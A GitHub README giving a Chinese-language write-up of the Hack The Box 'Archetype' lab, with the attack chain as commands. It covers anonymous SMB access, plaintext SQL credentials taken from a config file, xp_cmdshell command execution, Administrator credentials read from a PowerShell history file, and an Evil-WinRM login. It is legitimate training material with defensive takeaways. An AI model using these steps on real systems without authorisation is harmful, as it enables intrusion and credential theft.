amaljithas23-dot/htb-archetype-writeup
GitHub: amaljithas23-dot/htb-archetype-writeup
一份 Hack The Box Archetype 靶机的完整渗透测试报告,覆盖从 SMB 枚举到 MSSQL 利用再到 Windows 提权的全攻击链。
Stars: 0 | Forks: 0
# Hack The Box – Archetype Write-up(渗透报告)
## 概述
* **平台:** Hack The Box
* **靶机:** Archetype
* **类别:** Starting Point
* **操作系统:** Windows Server 2019
* **难度:** 非常简单
## 目标
该靶机的目标是执行侦察、枚举网络服务、发现暴露的凭据、通过 Microsoft SQL Server 获取远程命令执行权限,并提升特权以获取 Administrator 访问权限。
# 信息枚举
## Nmap 扫描
```
nmap -Pn -sC -sV
```
### 开放端口
| 端口 | 服务 |
| ---- | ------------------- |
| 135 | MSRPC |
| 139 | NetBIOS |
| 445 | SMB |
| 1433 | Microsoft SQL Server|
| 5985 | WinRM |
扫描发现目标机器上运行着 SMB、Microsoft SQL Server 和 WinRM 服务。
# SMB 枚举
列出可用的 SMB 共享:
```
smbclient -L // -N
```
发现了以下非管理共享:
```
backups
```
连接到该共享:
```
smbclient ///backups -N
```
列出文件:
```
ls
```
下载配置文件:
```
get prod.dtsConfig
```
退出 SMB:
```
exit
```
# 凭据发现
查看下载的配置文件:
```
cat prod.dtsConfig
```
该配置文件中包含了明文的 SQL Server 凭据。
# Microsoft SQL Server 访问
使用 Impacket 进行连接:
```
impacket-mssqlclient ARCHETYPE/sql_svc:@ -windows-auth
```
身份验证成功后,启用命令执行:
```
enable_xp_cmdshell
```
验证访问权限:
```
xp_cmdshell whoami
```
输出:
```
archetype\sql_svc
```
# User Flag(用户标志)
读取 user flag:
```
xp_cmdshell "type C:\Users\sql_svc\Desktop\user.txt"
```
成功获取 user flag。
# 提权
检查 PowerShell 历史记录文件:
```
xp_cmdshell "type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
```
历史记录文件泄露了 Administrator 的凭据。
# Administrator 访问
使用 Evil-WinRM 进行连接:
```
evil-winrm -i -u administrator -p ''
```
验证 Administrator 访问权限:
```
whoami
```
输出:
```
archetype\administrator
```
# Root Flag(根标志)
获取 Administrator flag:
```
type C:\Users\Administrator\Desktop\root.txt
```
成功捕获 root flag。
# 使用的工具
* Nmap
* smbclient
* Impacket (`impacket-mssqlclient`)
* Microsoft SQL Server (`xp_cmdshell`)
* Evil-WinRM
# 学到的技能
* 使用 Nmap 进行网络侦察
* SMB 共享枚举
* 匿名 SMB 访问
* 从配置文件中发现凭据
* 使用 Impacket 进行 MSSQL 身份验证
* 使用 `xp_cmdshell` 进行远程命令执行
* Windows 提权
* WinRM 远程管理
* Windows 后渗透方法论
# 攻击路径
```
Reconnaissance
│
▼
Nmap Scan
│
▼
SMB Enumeration
│
▼
Anonymous Access to backups Share
│
▼
Download prod.dtsConfig
│
▼
Extract SQL Credentials
│
▼
Authenticate to MSSQL
│
▼
Enable xp_cmdshell
│
▼
Command Execution as sql_svc
│
▼
Read PowerShell History
│
▼
Recover Administrator Credentials
│
▼
WinRM Login
│
▼
Administrator Access
│
▼
Retrieve Root Flag
```
# 关键要点
* 切勿在明文配置文件中存储凭据。
* 限制对 SMB 共享的匿名访问。
* 禁用不必要的 SQL Server 功能,例如 `xp_cmdshell`。
* 避免在 PowerShell 历史记录中存储敏感凭据。
* 遵循服务账号的最低权限原则。
* 保护 WinRM 等远程管理服务。
## 免责声明
本报告仅供教育目的。所演示的技术均在受控的 Hack The Box 实验室环境中执行。未经适当授权,请勿在系统上尝试这些技术。
标签:CTI, StruQ, 安全攻防, 提权, 插件系统, 网络安全, 隐私保护, 靶机 write-up